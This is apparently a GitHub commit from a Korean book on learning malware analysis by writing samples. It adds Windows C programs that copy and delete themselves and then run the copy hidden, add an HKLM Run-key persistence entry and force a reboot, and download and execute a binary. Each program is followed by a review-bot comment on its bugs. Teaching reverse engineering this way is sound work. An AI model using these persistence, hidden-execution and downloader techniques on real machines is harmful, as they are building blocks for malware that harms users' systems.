리버싱 이 정도는 알아야지 - 만들고 분석하면서 배우는 악성코드 분석
Showing
12 changed files
with
940 additions
and
0 deletions.
@@ -0,0 +1,10 @@ | ||
#include <windows.h> | ||
|
||
int main( ) | ||
{ | ||
Beep(0x200, 0x300); | ||
|
||
MessageBoxA(NULL, "Hi, Have a nice day!", "SecurityFactory", 0); | ||
|
||
return 1; | ||
} |
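Review bot: `main` ends with `return 1;`, which the C runtime hands to the caller as a failure exit status even though the sample ran to completion; the other samples in this commit return 0 on every error path and 1 on success, so the convention is inverted across the whole set. Prefer `return 0;` (or `EXIT_SUCCESS`) here and a non-zero value on the early-error returns elsewhere. `int main( )` is the old-style empty-parameter declaration; `int main(void)` is the prototype form.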
@@ -0,0 +1,98 @@ | ||
#include <windows.h> | ||
#include <stdio.h> | ||
|
||
int main( ) { | ||
HANDLE hSourceFile, hDestFile; | ||
TCHAR lpBuffPath[MAX_PATH] = {0,}, | ||
lpTargetPath[MAX_PATH] = {0, }; | ||
char *lpBuffer = NULL; | ||
DWORD dwFileSize = 0, | ||
dwRead = 0, | ||
dwWrite = 0; | ||
bool bResult = FALSE; | ||
|
||
//Get the Current Folder path. | ||
GetCurrentDirectory(MAX_PATH, lpBuffPath); | ||
|
||
//Get Source Sample 01.exe File Path. | ||
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "\\Sample 01.exe"); | ||
|
||
//Open the Source Sample 01.exe. | ||
hSourceFile = CreateFile(lpTargetPath, | ||
GENERIC_READ, | ||
0, NULL, | ||
OPEN_EXISTING, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hSourceFile == INVALID_HANDLE_VALUE) | ||
{ | ||
return 0; | ||
} | ||
|
||
//Get Source Sample.exe File Size. | ||
dwFileSize = GetFileSize(hSourceFile, NULL); | ||
if(dwFileSize == 0xFFFFFFFF) | ||
{ | ||
CloseHandle(hSourceFile); | ||
return 0; | ||
} | ||
|
||
//Allocate Buffer to Memory. | ||
lpBuffer = (char *)malloc(dwFileSize + 1); | ||
if(lpBuffer == NULL) | ||
{ | ||
CloseHandle(hSourceFile); | ||
return 0; | ||
} | ||
|
||
//Read the Source Sample.exe File Data. | ||
bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL); | ||
if(!bResult) | ||
{ | ||
free(lpBuffer); | ||
CloseHandle(hSourceFile); | ||
return 0; | ||
} | ||
CloseHandle(hSourceFile); | ||
|
||
//Delete the Source Sample.exe. | ||
bResult = DeleteFile(lpTargetPath); | ||
if(!bResult) | ||
{ | ||
free(lpBuffer); | ||
return 0; | ||
} | ||
|
||
//Get the Temp Folder path. | ||
GetTempPath(MAX_PATH, lpBuffPath); | ||
|
||
//Get Source Sample.exe File Path. | ||
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe"); | ||
|
||
//Create the DestSample.exe. | ||
hDestFile = CreateFile( lpTargetPath, | ||
GENERIC_WRITE, | ||
0, NULL, | ||
CREATE_NEW, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hDestFile == INVALID_HANDLE_VALUE) | ||
{ | ||
free(lpBuffer); | ||
return 0; | ||
} | ||
|
||
//Write the Source Sample.exe File Data in DestSample.exe File. | ||
bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL); | ||
if(!bResult) | ||
{ | ||
free(lpBuffer); | ||
CloseHandle(hDestFile); | ||
return 0; | ||
} | ||
CloseHandle(hDestFile); | ||
|
||
WinExec(lpTargetPath, SW_HIDE); | ||
|
||
return 1; | ||
} |
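Review bot: The source is deleted (`DeleteFile(lpTargetPath)`) before the copy in the temp folder has been created and written, so any failure in the `CreateFile(... CREATE_NEW ...)` or `WriteFile` that follow — including every second run, since CREATE_NEW fails once `Replicated Sample 01.exe` already exists — leaves no copy at all; move the DeleteFile block to after `CloseHandle(hDestFile)`. `WriteFile` also passes `dwFileSize` rather than the `dwRead` that `ReadFile` actually filled, so a short read would write uninitialized heap bytes into the new executable; use `WriteFile(hDestFile, lpBuffer, dwRead, &dwWrite, NULL)` and compare `dwRead` with `dwFileSize` before deleting anything. The return values of `GetCurrentDirectory`, `GetTempPath` and `WinExec` are not checked, and `wsprintf` into the MAX_PATH-sized `lpTargetPath` has no bound (wsprintf can emit up to 1024 characters), so a long working-directory path overflows the buffer. `lpBuffer` is never freed on the success path either.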
@@ -0,0 +1,119 @@ | ||
#include <windows.h> | ||
#include <stdio.h> | ||
|
||
int main( ) { | ||
WIN32_FIND_DATA FileData; | ||
HANDLE hFind, hSourceFile, hDestFile; | ||
TCHAR lpBuffPath[MAX_PATH] = {0, }, | ||
lpFindPath[MAX_PATH] = {0, }, | ||
lpTargetPath[MAX_PATH] = {0, }; | ||
char *lpBuffer = NULL; | ||
DWORD dwFileSize = 0, | ||
dwRead = 0, | ||
dwWrite = 0; | ||
bool bResult = FALSE; | ||
|
||
//Get the Current Folder path. | ||
GetCurrentDirectory(MAX_PATH, lpBuffPath); | ||
|
||
//Determines the Find Path. | ||
wsprintf(lpFindPath, "%s\\%s", lpBuffPath, "*.*"); | ||
|
||
//Find the first file in the specified area. | ||
hFind = FindFirstFile(lpFindPath, &FileData); | ||
if(hFind==INVALID_HANDLE_VALUE) | ||
{ | ||
return 0; | ||
} | ||
|
||
do { | ||
if(strcmp(FileData.cFileName, "Sample 01.exe") == 0) | ||
{ | ||
wsprintf(lpFindPath, "%s\\%s", lpBuffPath, FileData.cFileName); | ||
|
||
//Open the Source Sample.exe. | ||
hSourceFile = CreateFile(lpFindPath, | ||
GENERIC_READ, | ||
0, NULL, | ||
OPEN_EXISTING, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hSourceFile == INVALID_HANDLE_VALUE) | ||
{ | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Get Source Sample.exe File Size. | ||
dwFileSize = GetFileSize(hSourceFile, NULL); | ||
if(dwFileSize == 0xFFFFFFFF) | ||
{ | ||
CloseHandle(hSourceFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Allocate Buffer to Memory. | ||
lpBuffer = (char *)malloc(dwFileSize + 1); | ||
if(lpBuffer == NULL) | ||
{ | ||
CloseHandle(hSourceFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Read the Source Sample.exe File Data. | ||
bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL); | ||
if(!bResult) | ||
{ | ||
CloseHandle(hSourceFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
CloseHandle(hSourceFile); | ||
|
||
//Delete the Source Sample.exe. | ||
bResult = DeleteFile(lpFindPath); | ||
if(!bResult) | ||
{ | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Get the Temp Folder path. | ||
GetTempPath(MAX_PATH, lpBuffPath); | ||
|
||
//Get Source Sample.exe File Path. | ||
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe"); | ||
|
||
//Create the DestSample.exe. | ||
hDestFile = CreateFile( lpTargetPath, | ||
GENERIC_WRITE, | ||
0, NULL, | ||
CREATE_NEW, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
if(hDestFile == INVALID_HANDLE_VALUE) | ||
{ | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
|
||
//Write the Source Sample.exe File Data in DestSample.exe File. | ||
bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL); | ||
if(!bResult) | ||
{ | ||
CloseHandle(hDestFile); | ||
CloseHandle(hFind); | ||
return 0; | ||
} | ||
CloseHandle(hDestFile); | ||
|
||
WinExec(lpTargetPath, SW_HIDE); | ||
} | ||
} while(FindNextFile(hFind, &FileData)); //Find Next File in TampPath. | ||
|
||
CloseHandle(hFind); | ||
|
||
return 1; | ||
} |
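Review bot: `hFind` comes from `FindFirstFile`, so it must be released with `FindClose(hFind)` rather than `CloseHandle` — a search handle is not a kernel object handle, and each of the `CloseHandle(hFind)` calls in this hunk fails with ERROR_INVALID_HANDLE (and raises an exception when the process runs under a debugger). `lpBuffer` is malloc'd on each match but never freed on any path here, unlike the single-file version of this sample; the `ReadFile` failure branch in particular returns without releasing it. The same ordering problem applies: `DeleteFile(lpFindPath)` runs before the temp copy is created, so a `CREATE_NEW` failure on a re-run loses the file, and `WriteFile` should use `dwRead` instead of `dwFileSize`.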
@@ -0,0 +1,57 @@ | ||
#include <windows.h> | ||
#include <stdio.h> | ||
|
||
int main( ) | ||
{ | ||
HKEY hKey; | ||
TCHAR lpRunPath[] = "SOFTWARE\\Microsoft\\windows\\CurrentVersion\\Run"; | ||
TCHAR lpSamplePath[] = "C:\\Sample 01.exe"; | ||
TCHAR lpValue[MAX_PATH] = {0,}; | ||
DWORD dwCount = 0, | ||
dwValueSize = _MAX_PATH; | ||
LONG lResult; | ||
|
||
lResult = RegOpenKeyEx (HKEY_LOCAL_MACHINE, | ||
lpRunPath, | ||
0, | ||
KEY_ALL_ACCESS, | ||
&hKey); | ||
if(lResult != ERROR_SUCCESS) | ||
return 0; | ||
|
||
for (dwCount; lResult == 0x0000 || lResult == 0x00EA; dwCount++) | ||
{ | ||
//Retrieves the value of the registry. | ||
lResult = RegEnumValue (hKey, | ||
dwCount, | ||
lpValue, | ||
&dwValueSize, | ||
0, NULL, NULL, NULL); | ||
|
||
//If the Sample value exists, delete the value. | ||
if(!strcmp(lpValue, "Run_Sample")) | ||
RegDeleteValue(hKey, lpValue); | ||
} | ||
|
||
dwValueSize = (DWORD) strlen(lpSamplePath) + 1; | ||
|
||
//Register the Sample values. | ||
lResult = RegSetValueEx(hKey, | ||
"Run_Sample", | ||
0, REG_SZ, | ||
(BYTE*)lpSamplePath, | ||
dwValueSize); | ||
if(lResult != ERROR_SUCCESS) | ||
{ | ||
RegCloseKey(hKey); | ||
return 0; | ||
} | ||
|
||
RegCloseKey(hKey); | ||
|
||
MessageBox(NULL, "The registration has been completed.\nComputer Reset START!!", "RegEdit", MB_OK); | ||
|
||
WinExec("cmd.exe /C shutdown -r -f -t 0", SW_HIDE); | ||
|
||
return 1; | ||
} |
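Review bot: `dwValueSize` is an in/out parameter of `RegEnumValue` — on return it holds the length of the name just read — but it is set only once before the loop, so from the second iteration the buffer size passed in is the previous name's length and any longer name comes back as ERROR_MORE_DATA; the loop condition treats that as a reason to continue while still advancing `dwCount`, so such values are skipped, and `lpValue` may then still hold the stale previous name when `strcmp` runs. Reset it at the top of each iteration, `dwValueSize = MAX_PATH;`, and only compare when `lResult == ERROR_SUCCESS`. The enumerate-and-delete pass is also unnecessary, since `RegSetValueEx` replaces an existing `Run_Sample` value in place. It is worth a comment that `KEY_ALL_ACCESS` on an HKLM key requires an elevated process; without it `RegOpenKeyEx` fails and the program exits silently with status 0 before the message box and reboot.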
@@ -0,0 +1,77 @@ | ||
#include <windows.h> | ||
#include <wininet.h> | ||
#include <stdio.h> | ||
|
||
int main( ) { | ||
HINTERNET hInternet, hUrl; | ||
HANDLE hFile; | ||
DWORD dwRead = 0, | ||
dwWritten = 0, | ||
dwSize = 0; | ||
TCHAR lpUrlPath[MAX_PATH] = "https://live.sysinternals.com/procexp.exe", | ||
lpBuffer[100000], | ||
lpProcPath[256]; | ||
bool bResult = FALSE; | ||
|
||
GetTempPath(256, lpProcPath); | ||
strcat(lpProcPath, "\procexp.exe"); | ||
|
||
hFile = CreateFile( lpProcPath, | ||
GENERIC_WRITE, | ||
0, NULL, | ||
CREATE_ALWAYS, | ||
FILE_ATTRIBUTE_NORMAL, | ||
NULL); | ||
|
||
if(hFile != INVALID_HANDLE_VALUE) | ||
{ | ||
hInternet = InternetOpen( "HTTP", | ||
INTERNET_OPEN_TYPE_PRECONFIG, | ||
NULL, NULL, 0); | ||
if(!hInternet) | ||
{ | ||
printf("CALL FAIL_InternetOpen!!\n"); | ||
return 0; | ||
} | ||
|
||
hUrl = InternetOpenUrl( hInternet, | ||
lpUrlPath, | ||
NULL, 0, | ||
INTERNET_FLAG_RELOAD, 0); | ||
if(!hUrl) | ||
{ | ||
printf("CALL FAIL_InternetOpenUrl!!\n"); | ||
return 0; | ||
} | ||
|
||
//Repeat until the download is complete. | ||
do { | ||
//Make sure that the data is ready to be downloaded. | ||
bResult = InternetQueryDataAvailable(hUrl, &dwSize, 0, 0); | ||
if(!bResult) | ||
{ | ||
printf("CALL FAIL_InternetQueryDataAvailable!!\n"); | ||
return 0; | ||
} | ||
|
||
//Read Data From URL. | ||
bResult = InternetReadFile (hUrl, lpBuffer, dwSize, &dwRead); | ||
if(!bResult) | ||
{ | ||
printf("CALL FAIL_InternetReadFile!!\n"); | ||
return 0; | ||
} | ||
|
||
//Write File Data. | ||
WriteFile (hFile, lpBuffer, dwRead, &dwWritten, NULL); | ||
} while (dwRead != 0); | ||
|
||
InternetCloseHandle (hInternet); | ||
InternetCloseHandle (hUrl); | ||
} | ||
CloseHandle (hFile); | ||
|
||
ShellExecute(NULL, "open", lpProcPath, NULL, NULL, SW_SHOW); | ||
|
||
return 1; | ||
} |
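Review bot: `InternetReadFile(hUrl, lpBuffer, dwSize, &dwRead)` passes the byte count reported by `InternetQueryDataAvailable` straight through as the read length, but `lpBuffer` is a fixed 100000-element stack array, so a response chunk larger than that is written past the end of the stack buffer; clamp it, e.g. `InternetReadFile(hUrl, lpBuffer, dwSize < sizeof lpBuffer ? dwSize : sizeof lpBuffer, &dwRead)`. The literal `"\procexp.exe"` contains the invalid escape `\p`; since `GetTempPath` already returns a trailing backslash, the intended literal is `"procexp.exe"` (or `"\\procexp.exe"` if a second separator is acceptable). The early returns inside the loop leave `hFile`, `hInternet` and `hUrl` open and a partial `procexp.exe` in the temp folder, and when `CreateFile` fails the code still calls `CloseHandle(INVALID_HANDLE_VALUE)` and then `ShellExecute`s a path that was never written. For a sample that demonstrates download-and-execute, a comment should state that nothing verifies the downloaded binary (no hash or Authenticode check) before it is launched from the temp directory.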